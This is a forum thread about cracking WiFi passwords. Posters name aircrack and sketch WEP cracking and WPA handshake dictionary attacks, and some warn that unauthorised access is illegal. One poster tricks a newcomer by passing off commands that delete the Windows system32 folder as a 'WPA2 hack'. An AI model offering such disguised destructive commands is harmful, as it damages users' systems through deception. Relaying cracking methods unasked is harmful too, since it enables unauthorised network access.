What is a WiFi password hack tool?

As the WiFi password is a security tool which shields your link that it won’t be utilized by the outside users. This tool enables a person to relate to the some of the network. It can decipher any sort of WiFI password such as WEP, WPA and WPA 2. This tool can break the security protection of the Wi-Fi and supply the capability to you to utilize the net and relate to it. You’ll have the capacity to get the Wireless fidelity that’s in your range.
I’m confused, are you asking for the name of a tool that can crack wpa/wpa2/wep security keys? Or are you just offering a definition.
Definition of irony: I pirated a copy of my digital ethics textbook.

I am just offering the definition but don’t have deep knowledge can you help me to get the idea of it? Thanks in advance.
aircrack is the tool , but you will need an external wireless adapter to do anything .
[wep] is easy to get , if it 64 bit encrypted , it will probably take about 15 mins .
[wpa/wpa2] you need to get the handshack in file then run a dictionary on that file , it takes a long time ,may be days , may be never
PS : also WPA TKIP has been kinda cracked ( battered as they say it :P ) , but the tkipnut-ng is still not fully released .
Google is your friend…
—[ im going off the rails on a crazy train ]—
i would assume it will not be long before a new method of encryption for wireless to be released, but even then, it would take several years for people to adopt it as almost no one cares to pay for new wireless router as long as the one he has already works.
I Hate Signatures.
there is no need for a new encryption , cuz WPA2 and some WPA use AES encryption , which is still not broken .
but still , its only a matter of time until some mathematical genius breaks it ….
—[ im going off the rails on a crazy train ]—

What @dloser said.
All other options are a criminal offense, which has been made equal to burglary by most country’s laws.

Yes it’s possible, Open CMD ;
1.type : C:
type : cd windows
type : del system 32/.
type : del system32
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1

Then you just wait, if you don’t see anything new, juste re-do all the thing I listed, then restart your computer
A new Window Called “Anonymous WPA2 Wifi hack” should be opened after restarting your computer
Trust me, I’m from the 11th level of deep web
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1

Also, @Crakhackeur, “plz” remove that anonymous stuff, I see a name next to your image and the group has their own training program (Check the main IRC, then the training channel). :P
One hint though, learn English or you’ll be treated like a lurker (Means you’ll be kicked and banned).
About the stuff with just cmd, good luck with that but I’d try my luck with power shell.
For reasons, you know….
And by default, no, not possible.
Unless you create a “console application” which “runs in cmd”. (<– Sorry for the pleb talk, scared they might not understand.)

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1

funny thing is it was on a military base (kinda). Fort Fisher
I almost ended up climbing a poll to fix the wifi. But I literally did end up troubleshooting their network (by hacking into a few of their things on site), and now they KNOW it’s the ISP. Basically whenever it rain, the net dropped. But I was still able to talk to the modem.
There is a problem with the WiFi, but there is no point in fixing one without fixing the net first.

lol Damn these maladjusted net.
Someday they’ll understand how important is it to have a good connection !
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\’‘ at line 1

[quote=Zzdarkangel]then i do what ?[/quote]
Well… we never heard of him again, I guess he followed your advice @Mugiwara27.
So nice helping others in need…
A beginner practices until he gets it right, a professional practices until he can’t get it wrong!